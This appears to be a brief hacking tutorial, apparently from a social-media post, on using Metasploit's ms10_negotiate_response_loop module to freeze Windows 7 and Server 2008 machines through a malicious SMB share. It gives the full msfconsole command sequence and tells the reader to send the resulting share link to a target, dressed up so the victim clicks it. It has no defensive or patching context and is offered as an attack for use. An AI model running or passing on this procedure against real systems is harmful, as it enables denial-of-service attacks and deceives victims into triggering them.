🔹Step 1: A Little Background Material
👉 Remember that Metasploit has six types of modules, exploits, payloads, auxiliary, encoders, NOPs and post. In this hack, we will use an auxiliary module to attack the Windows 7 or Windows Server 2008 system’s SMB.
🔗 msf> use auxiliary/dos/windows/smb/ms10_negotiate_response_loop
🔹Step 2: Show Options
👉 Now that we have selected our module, let’s look at our options:
🔗 msf> auxiliary(ms10_negotiate_response_loop) show options
👉 As we can see , the only option we need to set is SVRHOST, which is our—the attacker’s—system. In my case, it is 192.168.1.100. Yours may be different; check your IP address by typing ifconfig in a terminal.
🔹Step 3: Set SVRHOST
👉 Next, set your SVRHOST by typing:
🔗 msf > auxiliary(ms10_negotiate_response_loop) set SVRHOST 192.168.1.100
🔹Step 4: Run
👉 In the last step, we run the auxiliary module and once the module executes, it generates a shared folder link which you can send to the target machine. In this case, the link is \\192.168.1.100\Shared\Anything.
🔗 msf > auxiliary (ms10_negotiate_response_loop) run
🔹Step 5: Making an Attractive Link
👉 Metasploit then starts the malicious SMB service and when the target clicks on the link, the target system will begin to run an infinite loop or Freeze.